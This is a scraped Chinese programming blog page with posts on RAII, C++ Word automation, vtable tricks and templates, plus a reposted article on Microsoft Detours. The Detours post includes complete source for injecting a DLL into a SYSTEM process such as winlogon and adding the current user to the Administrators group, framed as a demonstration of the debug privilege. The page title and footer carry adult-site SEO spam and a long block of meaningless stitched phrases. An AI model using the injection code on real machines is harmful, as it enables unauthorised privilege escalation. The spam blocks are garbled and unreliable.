青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

codeArt

codeArt

2010年11月6日

RAII是什么?來源于金慶的專欄

摘自《Extended STL》中譯


RAII:資源獲取即初始化

資源獲取即初始化(RAII, Resource Acquisition Is Initialization)是指,當你獲得一個資源的時候,不管這個資源是對象、內存、文件句柄或者其它什么,你都會在一個對象的構造函數中獲得它,并且在該對象的析構函數中釋放它。實現這種功能的類,我們就說它采用了"資源獲取即初始化(RAII)"的方式。這樣的類常常被稱為封裝類。

可以依據資源可變性和資源來源這兩個特征,來對RAII進行分類。


資源可變性

如果一個封裝類對其實例提供額外的功能,使得其實例能被賦予新資源,這個類表現出的這種特征即稱為"可變的RAII",否則就是"不可變的RAII"。

不可變的RAII,是使用起來最簡單的一種。說它簡單,是因為在這種情況下,無需在封裝類中提供用于指定資源的方法--不管是新分配的資源,還是對其他資源進行拷貝。這種RAII還意味著,類的析構函數總是可以假定,被封裝的資源是有效的。

與此相反,提供可變的RAII的類,就需要實現下列功能中的絕大部分,或者全部:缺省的或者空的構造函數,拷貝構造函數,拷貝賦值操作,用于指定資源的方法。最重要的是,這樣的類在析構函數和任何類似close()的方法中,釋放資源前,都必須檢測被封裝的資源是不是null。


資源來源

對于提供RAII的類來說,第二個重要的特征是,它們通過什么途徑獲取自己所管理的資源。以std::string為代表的類,使用的是內部初始化的RAII:它管理的資源--即內存中用于保存字符的緩沖區--是由它自己創建的,這一資源對外永遠是不可見的。與此不同的是,以std::auto_ptr為代表的類表現出外部初始化的RAII行為:它所管理的資源,是使用它的客戶程序(通過另外的某種方式獲得之后)交給它的。

內部初始化的RAII的封裝類,一般比較容易實現,但是功能上也比較受限制,因為它們獲取資源的機制是預先定義好的,并且是固定不變的。不過,這樣的類用起來也容易一些,或者說,比較難被誤用:因為客戶代碼幾乎沒有機會犯下能導致資源泄露的錯誤。

posted @ 2010-11-06 17:30 codeArt 閱讀(762) | 評論 (0)編輯 收藏

2010年9月30日

編程法則(轉自oschina.net)有意思

  1. 任何程序一旦部署即顯陳舊。
  2. 修改需求規范來適應程序比反過來做更容易。
  3. 一個程序如果很有用,那它注定要被改掉。
  4. 一個程序如果沒用,那它一定會有很好的文檔。
  5. 任何程序里都僅僅只有10%的代碼會被執行到。
  6. 軟件會一直膨脹到耗盡所有資源為止。
  7. 任何一個有點價值的程序里都會有至少一個bug。
  8. 原型完美的程度跟審視的人數成反比,反比值會隨著涉及的資金數增大。
  9. 軟件直到被變成產品運行至少6個月后,它最嚴重的問題才會被發現。
  10. 無法檢測到的錯誤的形式無限多樣,而能被檢測到的正好相反,被定義了的十分有限。
  11. 修復一個錯誤所需要投入的努力會隨著時間成指數級增加。
  12. 軟件的復雜度會一直增加,直到超出維護這個程序的人的承受能力。
  13. 任何自己的程序,幾個月不看,形同其他人寫的。
  14. 任何一個小程序里面都有一個巨大的程序蠢蠢欲出。
  15. 編碼開始的越早,花費的時間越長。
  16. 一個粗心的項目計劃會讓你多花3倍的時間去完成;一個細心的項目計劃只會讓你多花2倍的時間。
  17. 往大型項目里添加人手會使項目更延遲。
  18. 一個程序至少會完成90%,但永遠完成不了超過95%。
  19. 如果你想麻煩被自動處理掉,你得到的是自動產生的麻煩。
  20. 開發一個傻瓜都會使用的軟件,只有傻瓜愿意使用它。
  21. 用戶不會真正的知道要在軟件里做些什么,除非使用過。

posted @ 2010-09-30 23:42 codeArt 閱讀(260) | 評論 (0)編輯 收藏

2010年8月31日

c++操作word接口

注意事項:1多用Range,少用Selection,因為Word中,Selection對象只有一個。
【1】開啟word
_ApplicationPtr word_app;
HRESULT hr 
= word_app.CreateInstance("Word.Application", NULL); 
【2】新建一個文檔
COleVariant vTrue((short)TRUE),vFalse((short)FALSE),vOpt((long)DISP_E_PARAMNOTFOUND, VT_ERROR);
DocumentsPtr docs;
_DocumentPtr oDoc;
docs 
= word_app->GetDocuments();
doc 
= docs->Add(vOpt, vOpt, vOpt, vOpt);  
【3】設置文檔的頁面布局
PageSetupPtr page_setup = doc->GetPageSetup();
page_setup
->PutTopMargin(0);
page_setup
->PutBottomMargin(0);
page_setup
->PutRightMargin(0);
page_setup
->PutLeftMargin(0);
【4】插入文本
SelectionPtr selection;
selection 
= word_app->GetSelection();
_ParagraphFormatPtr parafmt 
= selection->GetParagraphFormat();
parafmt
->PutLineSpacingRule(wdLineSpaceExactly);
parafmt
->PutLineSpacing(50);
_FontPtr font;
font 
= oSel->GetFont();
font
->PutBold(1);
font
->PutColor(wdColorGreen);
font
->PutSize(20);
font
->PutName(_T("宋體"));
selection
->TypeText("ABC");
oSel
->TypeParagraph();
oSel
->TypeText("12345678901234567890");
oSel
->TypeParagraph();
【5】插入文本框
ShapesPtr shapes = doc->GetShapes();
ShapePtr textbox 
=  shapspp->AddTextbox(Office::msoTextOrientationHorizontal, 11100100);
【6】文本框中插入文本
 1ShapesPtr shapes = doc->GetShapes();
 2ShapePtr textbox =  shapspp->AddTextbox(Office::msoTextOrientationHorizontal, 11100100);
 3TextFramePtr textframe = textbox->GetTextFrame();
 4RangePtr range = textframe->GetTextRange();
 5long insert_before_count = range->Characters->GetCount();
 6range->InsertAfter("TEXT");
 7if (insert_before_count != 1)
 8    range->MoveStart(COleVariant((long)Word::wdCharacter), COleVariant(insert_before_count-1));
 9if(range != 0)
10{
11    _FontPtr font = range->GetFont();
12    font->PutBold(isBold);
13    font->PutItalic(isItalic);
14    font->PutColor((Word::WdColor)FontColor());
15    font->PutSize(FontSize);
16    font->PutName(FontType().c_str());
17}
【7】設置文本框的屬性
1textbox->GetTextFrame()->PutAutoSize(Office::msoAutoShape);
2textbox->GetTextFrame()->PutMarginBottom(0);
3textbox->GetTextFrame()->PutMarginTop(0);
4textbox->GetTextFrame()->PutMarginLeft(0);
5textbox->GetTextFrame()->PutMarginRight(0);
6textbox->GetLine()->PutVisible(Office::msoFalse);
7textbox->GetFill()->PutTransparency(1);
【8】插入圖片,這里需要注意,必須得先用InlineShape,這樣可以把圖片插入到指定的頁中,不然,所有的圖片只在第一頁。
 1ShapesPtr shapes = m_WordDoc->GetShapes();
 2InlineShapesPtr inline_shapes = selection_doc->GetRange()->GetInlineShapes();
 3InlineShapePtr inline_shape = inline_shapes->AddPicture(“picture_path”, COleVariant((long)0), COleVariant((long)1));
 4ShapePtr shape = inline_shape->ConvertToShape();
 5shape->PutWidth(width);
 6shape->PutHeight(hehight());
 7shape->PutTop(Y);
 8shape->PutLeft(X);
 9if(shape->GetType() == Office::msoPicture)
10{
11    Word::WrapFormatPtr wrapp = shape->GetWrapFormat();
12    wrapp->PutType(Word::wdWrapBehind);
13}

14
【9】插入直線
1ShapesPtr shapes = doc->GetShapes();
2Word::ShapePtr line = shapes->AddLine(x1,y1, x2,y2);
3if (line->GetType() == Office::msoLine)
4{
5    Word::LineFormatPtr LineFmt = line->GetLine();
6    LineFmt->PutWeight(lr->weight_);
7}
【10】插入分隔符
selection->InsertBreak(COleVariant((long)wdColumnBreak));
selection
->InsertBreak(COleVariant((long)wdSectionBreakContinuous));
selection
->InsertBreak(COleVariant((long)wdPageBreak));

【11】設置欄目個數和欄目的寬度
這里一定要注意add函數的邏輯
1SectionsPtr word_sections = doc->GetSections();
2long num = word_sections->GetCount();
3SectionPtr word_section = word_sections->Item(num-1);
4PageSetupPtr page_setup = word_section->GetPageSetup();
5TextColumnsPtr text_cols = page_setup>GetTextColumns();
6text_cols->PutEvenlySpaced(0);
7text_cols->Add(COleVariant(col_width), COleVariant((long)0), COleVariant((long)false));
【12】插入表格
 1TablesPtr tables = oSel->GetTables();    
 2TablePtr table = tables->Add(oSel->GetRange(), 25);
 3    
 4BordersPtr bords = table->GetBorders();
 5bords->PutOutsideLineStyle(wdLineStyleSingle);
 6bords->PutInsideLineStyle(wdLineStyleSingle);
 7for (int i = 1; i<=2; i++)
 8{
 9    for (int j = 1; j<=5; j++)
10    {
11        table->Cell(i,j)->GetRange()->PutText("20");
12    }

13}

14
15CellPtr cell = table->Cell(1,1);
16cell->Merge(table->Cell(1,2));
【13】保存文檔并退出
1COleVariant vTrue((short)TRUE),vFalse((short)FALSE),vOpt((long)DISP_E_PARAMNOTFOUND, VT_ERROR);
2_DocumentPtr active_doc; 
3active_doc = word_app->GetActiveDocument();
4active_doc->SaveAs(COleVariant("D:\\doc1.doc"), 
5                   COleVariant((short)0),
6                   vFalse, COleVariant(""), vTrue, COleVariant(""),
7                   vFalse, vFalse, vFalse, vFalse, vFalse);
8word_app->Quit(vOpt, vOpt, vOpt);
在word優秀的構架中還有許許多多的接口,上面只是舉例實現一個普通的文檔,希望對大家有用。

posted @ 2010-08-31 19:35 codeArt 閱讀(9100) | 評論 (4)編輯 收藏

C++的繼承

 

 1class base
 2{
 3public:
 4    base(){};
 5    ~base(){};
 6
 7    virtual void func1(){printf("base::func1\r\n");};
 8    virtual void func2(){printf("base::func2\r\n");};
 9    int ma;
10    int mb;
11    void member_func(){printf("base::member_func\r\n");}
12}
;
13
14class derive : public base
15{
16public:
17    derive(){};
18    ~derive(){};
19
20    virtual void func1(){printf("derive::func1\r\n");};
21    virtual void func3(){printf("derive::func3\r\n");};
22    virtual void func4(){printf("derive::func4\r\n");};
23
24    int ma2;
25    int mb2;
26
27    void member_func2(){printf("derive::member_func2\r\n");}
28}
;
29
30class derive2 : public derive
31{
32public:
33    derive2(){};
34    ~derive2(){};
35
36    virtual void func3(){printf("derive2::func3\r\n");};
37    virtual void func4(){printf("derive2::func4\r\n");};
38    virtual void func5(){printf("derive2::func5\r\n");};
39
40    int ma3;
41    int mb3;
42
43    void member_func3(){printf("derive2::member_func3\r\n");}
44}
;
45int _tmain(int argc, _TCHAR* argv[])
46{
47    typedef void (*Fun)(void);
48
49    Fun pfun = 0;
50    derive2* d2 = new derive2;
51    int* p = (int*)d2;
52    *(p+1= 20;
53    *(p+2= 30;
54    *(p+3= 200;
55    *(p+4= 300;
56    *(p+5= 2000;
57    *(p+6= 30000;
58
59    for (int i = 0; i<5; i++)
60    {
61        Fun pfun = (Fun)*((int*)*(p+0)+i);
62        if (pfun)
63            pfun();
64        else
65            printf("null\r\n");
66     }

67    
68    base* b2 = new derive;
69    int* p2 = (int*)b2;
70    pfun = (Fun)*((int*)*(p2+0)+3);
71    pfun();
72    
73    return 0;
74}

75

 

posted @ 2010-08-31 01:32 codeArt 閱讀(352) | 評論 (0)編輯 收藏

2010年8月29日

關于Detours[轉]

Detours是微軟開發的一個函數庫(源代碼可在http://research.microsoft.com/sn/detours 免費獲得), 用于修改運行中的程序在內存中的影像,從而即使沒有源代碼也能改變程序的行為。具體用途是:

攔截WIN32 API調用,將其引導到自己的子程序,從而實現WIN32 API的定制。
為一個已在運行的進程創建一新線程,裝入自己的代碼并運行。
本文將簡介Detours的原理,Detours庫函數的用法, 并利用Detours庫函數在Windows NT上編寫了一個程序,該程序能使有“調試程序”的用戶權限的用戶成為系統管理員,附錄利用Detours庫函數修改該程序使普通用戶即可成為系統管理員(在NT4 SP3上)。

一. Detours的原理

1. WIN32進程的內存管理

總所周知,WINDOWS NT實現了虛擬存儲器,每一WIN32進程擁有4GB的虛存空間, 關于WIN32進程的虛存結構及其操作的具體細節請參閱WIN32 API手冊, 以下僅指出與Detours相關的幾點:

(1) 進程要執行的指令也放在虛存空間中
(2) 可以使用QueryProtectEx函數把存放指令的頁面的權限更改為可讀可寫可執行,再改寫其內容,從而修改正在運行的程序
(3) 可以使用VirtualAllocEx從一個進程為另一正運行的進程分配虛存,再使用 QueryProtectEx函數把頁面的權限更改為可讀可寫可執行,并把要執行的指令以二進制機器碼的形式寫入,從而為一個正在運行的進程注入任意的代碼

2. 攔截WIN32 API的原理

Detours定義了三個概念:

(1) Target函數:要攔截的函數,通常為Windows的API。
(2) Trampoline函數:Target函數的復制品。因為Detours將會改寫Target函數,所以先把Target函數復制保存好,一方面仍然保存Target函數的過程調用語義,另一方面便于以后的恢復。
(3) Detour 函數:用來替代Target函數的函數。

Detours在Target函數的開頭加入JMP Address_of_ Detour_ Function指令(共5個字節)把對Target函數的調用引導到自己的Detour函數, 把Target函數的開頭的5個字節加上JMP Address_of_ Target _ Function+5作為Trampoline函數。例子如下:

攔截前:Target _ Function:
;Target函數入口,以下為假想的常見的子程序入口代碼
push   ebp
mov   ebp,   esp
push   eax
push   ebx
Trampoline:
;以下是Target函數的繼續部分
……

攔截后: Target _ Function:
jmp   Detour_Function
Trampoline:
;以下是Target函數的繼續部分
……

Trampoline_Function:
; Trampoline函數入口, 開頭的5個字節與Target函數相同
push   ebp
mov   ebp,   esp
push   eax
push   ebx
;跳回去繼續執行Target函數
jmp   Target_Function+5
3. 為一個已在運行的進程裝入一個DLL

以下是其步驟:

(1) 創建一個ThreadFuction,內容僅是調用LoadLibrary。
(2) 用VirtualAllocEx為一個已在運行的進程分配一片虛存,并把權限更改為可讀可寫可執行。
(3) 把ThreadFuction的二進制機器碼寫入這片虛存。
(4) 用CreateRemoteThread在該進程上創建一個線程,傳入前面分配的虛存的起始地址作為線程函數的地址,即可為一個已在運行的進程裝入一個DLL。通過DllMain 即可在一個已在運行的進程中運行自己的代碼。

二. Detours庫函數的用法

因為Detours軟件包并沒有附帶幫助文件,以下接口僅從剖析源代碼得出。

1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

功能:從一DLL中找出一函數的入口地址
參數:pszModule是DLL名,pszFunction是函數名。
返回:名為pszModule的DLL的名為pszFunction的函數的入口地址
說明:DetourFindFunction除使用GetProcAddress外,還直接分析DLL的文件頭,因此可以找到一些GetProcAddress找不到的函數入口。

2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
功能:該宏把名為target_name 的Target函數生成Trampoline函數,以后調用 trampoline_prototype在語義上等于調用Target函數。

3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
功能:用Detour 函數攔截Target函數
參數:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數的入口地址。

4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
功能:恢復Target函數
參數:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數的入口地址。

5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
功能:為一個已在運行的進程裝入一個DLL
參數:hProcess是進程的句柄,lpDllName是要裝入的DLL名

三. 程序實例

以一個能使有“調試程序”的用戶權限的用戶成為系統管理員的程序做例子說明Detours 庫函數的用法。程序的設計思路是找一個以System帳號運行的進程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其中注入把當前用戶加入到 Administrators本地組的DLL,因為該DLL在這些進程的安全上下文環境運行,所以有相應的權限。

先編寫相應的DLL:

/*admin.dll, 當進程裝入時會把名為szAccountName
的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創建一共享段實現進程間的數據通訊,
szAccountName 是用戶名,bPrepared說明
szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調用SetAccountName設置要加入到Administrators
本地組的用戶名,并通知DllMain
已初始化szAccountName ,
以后被裝入時可調用ElevatePriv */

__declspec(dllexport) VOID WINAPI
SetAccountName(wchar_t *Name)
{
    wcscpy(szAccountName,Name);
    bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname=szAccountName;
    NetLocalGroupAddMembers(NULL,L"Administrators",
        3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
        DWORD dwReason, PVOID lpReserved)
{
    switch (dwReason) {
   case DLL_THREAD_ATTACH:
       if (bPrepared)
           ElevatePriv();
    }
    return TRUE;
}

程序如下:

/*AddMeToAdministrators.exe 把當前用戶加入到
Administrators本地組。使用方法為:(1)
運行任務管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進程ID (2)執行AddMeToAdministrators.exe procid, 其中procid為(1)記下的進程ID (3)簽退再簽到,運行用戶管理器,即可發現自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
    HANDLE hProcess, hAccessToken;
    wchar_t InfoBuffer[1000],szAccountName[200],
        szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200,
        dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = GetCurrentProcess();

    OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

    GetTokenInformation(hAccessToken,TokenUser,
        InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid,
        szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);
    wcscpy(szName,szDomainName);
    wcscat(szName,L"\");
        wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調試程序”的用戶權限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, szPrivName,
        &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken, FALSE, &tp,
        sizeof(tp), NULL, NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
                   LPSTR lpszCmdLine, int
                   nCmdShow)
{
    INT argc;
    WCHAR **argv;
    argv = CommandLineToArgvW(GetCommandLineW(),
        &argc);
    INT nProcessId = -1;
    if (argc!=2){
        wprintf(L"usage %s pid", argv[0]);
        return 1;
    }
    nProcessId = _wtoi(argv[1]);
    printf("%d ",nProcessId);
    /*要成功執行ContinueProcessWithDll,要對winlogon.exe等進程的進程句柄有讀寫存儲器內容和創建線程的權限,EnablePrivilege使本進程有這樣的權利。*/

    if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
        printf("AdjustTokenPrivilege Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    HANDLE   gNewHandle =
        OpenProcess(PROCESS_ALL_ACCESS
        , TRUE, nProcessId);
    if (!gNewHandle){
        printf("OpenProcess Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    wchar_t szName[100];
    GetCurrentUser(szName);
    SetAccountName(szName);
    If (!ContinueProcessWithDll(gNewHandle,
        L"c:\temp\admin.dll")) {
            printf("ContinueProcessWithDll failed %u",
                (UINT)GetLastError());
            return 3;
    }
    return 0;
}
因為“調試程序”的用戶權限缺省情況下僅賦予給管理員,因此并不會造成安全漏洞。但該程序揭示出“調試程序”的用戶權限其實是至高無上的用戶權限,只能授予給可信用戶。

四. 結論      Detours是一強大的工具,提供了簡單易用的函數接口來攔截WIN32 API調用和為一個已在運行的進程裝入一個DLL。

posted @ 2010-08-29 23:08 codeArt 閱讀(638) | 評論 (0)編輯 收藏

2010年8月28日

QT中的插件

     摘要:   QT有著獨特的插件管理方法便于使用,調理清晰.完全可以替代WIN32下的動態庫,靜態庫.不過,QT也支持動態庫和靜態庫加載 .見QLibrary,最終,QLibrary調用WIN32下的LoadLibrary,GetProcAddress函數. Qt插件的使用方法: [1]project_main_1工程中定義接口 class interface__1{publ...  閱讀全文

posted @ 2010-08-28 19:56 codeArt 閱讀(5740) | 評論 (0)編輯 收藏

努力,從現在開始

之前寫blog只是備忘,看了一些很好的技術文章之后,很是羨慕.從現在開始,好好的維護這個blog啦.

posted @ 2010-08-28 16:15 codeArt 閱讀(218) | 評論 (0)編輯 收藏

2010年8月27日

用在COM中,類行為比較怪異的代碼

#include <iostream>

using namespace std;

template <typename T>
class Base {
public:
void fun() {
cout << "Base::fun" << endl;
}

void doSomething() {
T* pT = static_cast<T*>(this);
pT->fun();
}
};

class Drive : public Base<Drive> {
public:
void fun() {
cout << "Drive::fun" << endl;
}
};

class MostDrive : public Drive {
public:
void fun() {
cout << "MostDrive::fun" << endl;
}
};

int main() {
MostDrive obj;
obj.doSomething();

return 0;
}

posted @ 2010-08-27 21:02 codeArt 閱讀(321) | 評論 (0)編輯 收藏

c++重載->

#include <iostream>

using namespace std;

class Inner {
public:
void Fun() {
cout << "Inner::Fun" << endl;
}
};

class Outer {
private:
Inner* m_pInner;

public:
Outer(Inner* p_pInner) : m_pInner(p_pInner) {
}

Inner* operator -> () {
return m_pInner;
}
};

int main() {
Inner objInner;
Outer objOuter(&objInner);

objOuter->Fun();

return 0;
}

posted @ 2010-08-27 20:46 codeArt 閱讀(223) | 評論 (0)編輯 收藏

策略模式c++表述備忘

#include <iostream>

using namespace std;

class Round1 {
public:
void Play() {
cout << "Round1::Play" << endl;
}
};

class Round2 {
public:
void Play() {
cout << "Round2::Play" << endl;
}
};

template <typename T>
class Strategy {
private:
T objT;
public:
void Play() {
objT.Play();
}
};

int main() {
Strategy<Round1> obj1;
Strategy<Round2> obj2;

obj1.Play();
obj2.Play();

return 0;
}

posted @ 2010-08-27 20:43 codeArt 閱讀(312) | 評論 (0)編輯 收藏

僅列出標題  下一頁
<2025年9月>
31123456
78910111213
14151617181920
21222324252627
2829301234
567891011

導航

統計

常用鏈接

留言簿(1)

隨筆分類

隨筆檔案

文章檔案

編程與開源

搜索

最新評論

閱讀排行榜

評論排行榜

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            国产精品一区二区三区四区五区| 国产精品电影观看| 影音国产精品| 亚洲精品社区| 亚洲图片你懂的| 欧美视频国产精品| 欧美一级片久久久久久久| 久久久久久久高潮| 亚洲精品精选| 国产麻豆91精品| 国产在线欧美| 欧美激情综合色综合啪啪| 亚洲在线成人| 欧美好骚综合网| 性欧美xxxx视频在线观看| 韩国av一区二区| 在线欧美三区| 亚洲欧美视频在线| 亚洲动漫精品| 国产欧美日韩精品丝袜高跟鞋 | 国产欧美日韩综合精品二区| 国产午夜精品全部视频在线播放| 欧美精品国产精品| 国产精品国产三级国产普通话99 | 国产精品色在线| 久久久久久亚洲精品不卡4k岛国| 亚洲国产天堂网精品网站| 亚洲福利视频网| 一区二区三区国产| 亚洲成人在线免费| 午夜精品一区二区三区在线播放| 欧美gay视频| 久久婷婷蜜乳一本欲蜜臀| 一区二区日韩| 蜜臀av国产精品久久久久| 久久九九国产精品| 亚洲精品三级| 免费久久99精品国产自| 久久国产精彩视频| 亚洲免费影院| 一区二区欧美亚洲| 亚洲精品国产精品国产自| 亚洲深夜激情| 午夜精品久久久久99热蜜桃导演| 欧美大片免费观看在线观看网站推荐| 久久久精品国产免大香伊| 亚洲人成精品久久久久| 久久青青草原一区二区| 性欧美8khd高清极品| 欧美一区二区大片| 国产精品成人久久久久| 99这里有精品| 亚洲女同在线| 亚洲欧美资源在线| 亚洲肉体裸体xxxx137| 麻豆91精品| 欧美片第1页综合| 欧美日韩一级片在线观看| 国产精品啊v在线| 国产欧美精品日韩精品| 亚洲一级在线| 欧美在线一区二区| 欧美成人a视频| 久久亚洲高清| 亚洲国产日韩欧美| 一区二区三区欧美在线观看| 亚洲国产成人不卡| 欧美日韩国产一区| 国产一区美女| 久久人人精品| 亚洲视频电影在线| 欧美在线播放高清精品| 欧美激情亚洲视频| 9l国产精品久久久久麻豆| 亚洲国产精品尤物yw在线观看| 美女露胸一区二区三区| 亚洲三级视频在线观看| 一区二区三区不卡视频在线观看 | 久久久蜜桃一区二区人| 欧美影院一区| 亚洲日本va午夜在线影院| 国产综合精品| 欧美成人午夜激情在线| 欧美精品久久久久a| 亚洲欧美综合另类中字| 午夜在线观看欧美| 国产一区二区毛片| 亚洲最新色图| 亚洲午夜av电影| 欧美va亚洲va香蕉在线| 亚洲久久成人| 美女黄网久久| 欧美日韩精品免费观看视一区二区 | 亚洲免费精品| 午夜精品网站| 亚洲免费av片| 久久国产精品久久久| 艳女tv在线观看国产一区| 99在线精品视频| 欧美精品在线视频观看| 性伦欧美刺激片在线观看| 久久国产日韩欧美| 亚洲一级在线| 蜜桃精品一区二区三区| 亚洲一级在线观看| 欧美成人一二三| 亚洲激情第一区| 亚洲一区二区成人| 一本色道久久综合亚洲精品按摩| 久久精品国产999大香线蕉| 亚洲天堂成人在线观看| 久久精品国产清高在天天线| 亚洲综合大片69999| 亚洲天堂第二页| 亚洲精品免费电影| 久久视频一区| 久久免费午夜影院| 国产精品久久激情| 亚洲精品一区二区三区樱花| 精品成人一区| 亚洲福利视频网站| 激情av一区| 久久国产精品久久国产精品 | 国产私拍一区| 亚洲在线播放| 亚洲综合国产| 欧美日韩国产色视频| 亚洲缚视频在线观看| 国产在线拍揄自揄视频不卡99| 日韩视频不卡中文| 国产精品久久久久免费a∨| 在线视频免费在线观看一区二区| 久久福利影视| 久久久青草婷婷精品综合日韩| 国产精品激情电影| 一区二区日韩免费看| 亚洲视频在线观看网站| 欧美日韩视频在线| 99精品福利视频| 亚洲视频你懂的| 国产精品国产三级欧美二区 | 亚洲私人黄色宅男| 欧美日韩直播| 亚洲午夜av电影| 久久精品视频在线| 欧美精品日韩一区| 亚洲人成小说网站色在线| 亚洲免费观看视频| 欧美性猛交一区二区三区精品| 99精品欧美一区二区三区综合在线 | 国产精品毛片在线看| 中文日韩电影网站| 亚洲欧美一区二区三区久久| 国产精品最新自拍| 久久―日本道色综合久久| 欧美高清在线观看| 9人人澡人人爽人人精品| 欧美三级网址| 香蕉久久夜色| 欧美激情按摩| 亚洲欧美视频一区| 亚洲电影天堂av| 欧美日韩一区成人| 欧美一区二区三区在线观看| 亚洲成色777777女色窝| 国产美女精品| 久久一区二区三区四区| 亚洲日本成人女熟在线观看| 亚洲欧美日韩另类| 伊伊综合在线| 欧美日韩国产精品成人| 欧美一区二区三区另类| 亚洲精华国产欧美| 91久久精品一区二区三区| 欧美成人一区在线| 亚洲字幕在线观看| 亚洲国产欧美日韩| 欧美在线黄色| 一本色道久久88精品综合| 国产一区二区精品丝袜| 欧美人与性禽动交情品 | 乱码第一页成人| 国产精品亚洲综合天堂夜夜| 久久精品人人爽| 久久精品国产999大香线蕉| 亚洲国产老妈| 国产精品综合网站| 欧美日韩一区二区三区在线| 久久精品国产免费观看| 99精品欧美一区二区三区| 美日韩精品视频免费看| 亚洲在线观看视频网站| 亚洲国产另类久久精品| 国产精品一区免费视频| 欧美福利小视频| 亚洲国产精品久久久久| 久久久亚洲一区| 亚洲免费视频在线观看| 亚洲卡通欧美制服中文| 一区在线视频观看|